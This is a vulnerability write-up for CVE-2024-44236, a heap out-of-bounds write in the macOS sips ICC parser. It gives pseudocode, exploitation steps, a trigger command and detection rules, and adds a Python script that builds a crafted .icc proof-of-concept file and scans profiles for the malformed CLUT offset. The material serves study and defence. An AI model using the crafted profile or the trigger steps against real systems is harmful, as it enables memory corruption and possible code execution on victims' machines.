WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Overview
An out-of-bounds write vulnerability in the ICC profile parser of Apple's macOS Scriptable Image Processing System (sips) (macOS 15.0.1, sips-307), caused by improper validation of the offsetToCLUT field in lutAToBType (mAB ) and lutBToAType (mBA ) tags. A crafted ICC file can trigger zero-writes of up to 16 bytes past the end of the heap buffer holding the tag data, corrupting heap metadata or function pointers and enabling arbitrary code execution (CVE-2024-44236).
Vulnerable Code
The vulnerable function zeroes 16 bytes starting from an attacker-controlled offset without ensuring that the whole 16-byte range lies within the allocated tag buffer:

```c
// Pseudocode from sub_1000194D0 in sips-307 (macOS 15.0.1).
// buffer holds the tag data (tagDataSize bytes); offsetToCLUT is read straight
// from the mAB/mBA tag and is relative to the start of buffer.
for (i = offsetToCLUT; i < offsetToCLUT + 16; i++) {
    if (i > numberOfInputChannels && buffer[i] != 0)
        buffer[i] = 0;   // out-of-bounds write once i >= tagDataSize
}
```

The only bounds check performed before this loop is offsetToCLUT <= totalDataLength, which does not account for the 16 bytes the loop touches. Setting offsetToCLUT == tagDataSize passes that check, yet the loop then indexes buffer[tagDataSize] through buffer[tagDataSize + 15], zeroing up to 16 bytes past the end of the allocation and corrupting whatever the allocator placed next to it.
Exploitation Steps
1. Craft a malicious .icc profile:
   - Build the 128-byte ICC header with the acsp signature and a tag table holding a single lutAToBType (mAB ) or lutBToAType (mBA ) tag entry.
   - Inside that tag's data, set offsetToCLUT equal to the tag's size (tagDataSize) from the tag table entry, so the zeroing loop starts at the first byte past the tag buffer.
   - Place attacker-controlled data immediately after the tag data block to overwrite heap metadata.
2. Trigger parsing:
   sips --verifyColor malicious.icc
3. Heap metadata corruption: the OOB zero-writes overwrite allocator metadata or adjacent pointers, allowing the attacker to hijack control flow and achieve arbitrary code execution in the context of the sips process.
Impact
Successful exploitation results in arbitrary code execution with the privileges of the user running sips on a macOS system with the vulnerable utility. The attacker only has to get a crafted ICC profile processed by sips (for example the --verifyColor invocation above), which is why ZDI classifies the bug as remote code execution.
Detection
- Monitor file transfers on common protocols (FTP, HTTP/S, IMAP, SMB, NFS, SMTP).
- Inspect transferred files that carry the acsp signature at offset 36 of the ICC header.
- For each mAB or mBA tag, check whether the Offset to CLUT field equals the Tag data size from the tag table entry.
- Flag the file as suspicious if this condition is met.
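The crafting procedure from Exploitation Steps and the tag check from Detection, as one added example that is not part of the original page or of the ZDI research: build_lut_tag and build_icc assemble a minimal profile whose mAB/mBA tag has offsetToCLUT == tagDataSize, and scan_icc walks a profile's tag table and flags such tags. Assumptions: the tag layouts follow the ICC.1 specification (the CLUT offset sits at byte 24 of both mAB and mBA tags and is relative to the tag start), the tag is registered under the A2B0 signature, the header fields other than acsp are filler, and all function names are hypothetical. The scanner goes slightly beyond the page's equality rule: from the loop bounds in the pseudocode it also reports a CLUT offset inside the last 15 bytes of the tag, which would push part of the 16 zero-writes past the buffer, while still recording the exact equality indicator separately.

```python
import struct

# lutAToBType / lutBToAType share one layout: type signature at 0, channel
# counts at 8/9, and five 32-bit offsets (B curves, matrix, M curves, CLUT,
# A curves) at bytes 12..31, all relative to the start of the tag.
LUT_TAG_TYPES = (b"mAB ", b"mBA ")
CLUT_OFFSET_FIELD = 24
ICC_HEADER_LEN = 128
ZEROED_BYTES = 16          # the sips loop zeroes 16 bytes from offsetToCLUT


def build_lut_tag(tag_type, size=64, clut_offset=None):
    """Build a minimal mAB/mBA tag of `size` bytes (constructed test data).

    clut_offset=None reproduces the trigger: the field is set to the tag's own
    size, so the zeroing loop starts one byte past the end of the tag buffer.
    """
    if tag_type not in LUT_TAG_TYPES:
        raise ValueError("tag_type must be b'mAB ' or b'mBA '")
    if size < 44 or size % 4:
        raise ValueError("size must be a multiple of 4 and hold the 12-byte curve stub")
    if clut_offset is None:
        clut_offset = size
    tag = bytearray(size)
    tag[0:4] = tag_type          # type signature; bytes 4..7 stay reserved (zero)
    tag[8] = 3                   # number of input channels
    tag[9] = 3                   # number of output channels
    struct.pack_into(">IIIII", tag, 12, 32, 0, 0, clut_offset, 0)
    struct.pack_into(">4sII", tag, 32, b"curv", 0, 0)   # zero-entry B curve stub
    return bytes(tag)


def build_icc(tags):
    """Assemble a profile from [(tag_signature, tag_data), ...]: header, tag table, data."""
    table_len = 4 + 12 * len(tags)
    entries, body = b"", b""
    offset = ICC_HEADER_LEN + table_len
    for sig, data in tags:
        entries += struct.pack(">4sII", sig, offset, len(data))
        padded = data + b"\0" * (-len(data) % 4)     # tag data is 4-byte aligned
        body += padded
        offset += len(padded)
    header = bytearray(ICC_HEADER_LEN)
    struct.pack_into(">I", header, 0, ICC_HEADER_LEN + table_len + len(body))
    header[8:12] = b"\x04\x30\x00\x00"   # profile version 4.3 (filler)
    header[12:16] = b"mntr"              # device class: display (filler)
    header[16:20] = b"RGB "              # data colour space (filler)
    header[20:24] = b"XYZ "              # profile connection space (filler)
    header[36:40] = b"acsp"              # profile file signature
    return bytes(header) + struct.pack(">I", len(tags)) + entries + body


def scan_icc(blob):
    """Walk the tag table and report mAB/mBA tags whose CLUT offset does not
    leave room for the 16 zeroed bytes inside the tag.

    Each finding records zdi_match (offset to CLUT == tag data size, the
    indicator from the page) and oob_bytes (how many of the 16 zero-writes
    fall past the tag according to the loop bounds).
    """
    findings = []
    if len(blob) < ICC_HEADER_LEN + 4 or blob[36:40] != b"acsp":
        return findings                          # not an ICC profile
    (count,) = struct.unpack_from(">I", blob, ICC_HEADER_LEN)
    for i in range(count):
        entry = ICC_HEADER_LEN + 4 + 12 * i
        if entry + 12 > len(blob):
            break                                # truncated tag table
        sig, off, size = struct.unpack_from(">4sII", blob, entry)
        if off + CLUT_OFFSET_FIELD + 4 > len(blob) or size < CLUT_OFFSET_FIELD + 4:
            continue                             # cannot carry the CLUT offset field
        tag_type = blob[off:off + 4]
        if tag_type not in LUT_TAG_TYPES:
            continue
        (clut,) = struct.unpack_from(">I", blob, off + CLUT_OFFSET_FIELD)
        if clut == 0:
            continue                             # 0 means the tag has no CLUT
        oob = min(ZEROED_BYTES, clut + ZEROED_BYTES - size)
        if oob > 0:
            findings.append({
                "tag": sig, "type": tag_type, "tag_size": size,
                "offset_to_clut": clut, "zdi_match": clut == size, "oob_bytes": oob,
            })
    return findings


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "malicious.icc"
    poc = build_icc([(b"A2B0", build_lut_tag(b"mAB "))])
    with open(path, "wb") as fh:
        fh.write(poc)
    print(f"wrote {len(poc)} bytes to {path}")
    for finding in scan_icc(poc):
        print("SUSPICIOUS:", finding)
```

Running the script writes the crafted profile and immediately reports it; pointing scan_icc at the bytes of any other .icc file is enough to triage captured samples. The profile only sets the fields the trigger needs, so it is a reproduction of the crash condition, not a working exploit: the heap shaping described in step 1 is not attempted here.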
References
- ZDI blog: CVE-2024-44236: Remote Code Execution Vulnerability in Apple macOS sips Utility, https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos
- Apple October 2024 security update (ships the fix for CVE-2024-44236), https://support.apple.com/en-us/121564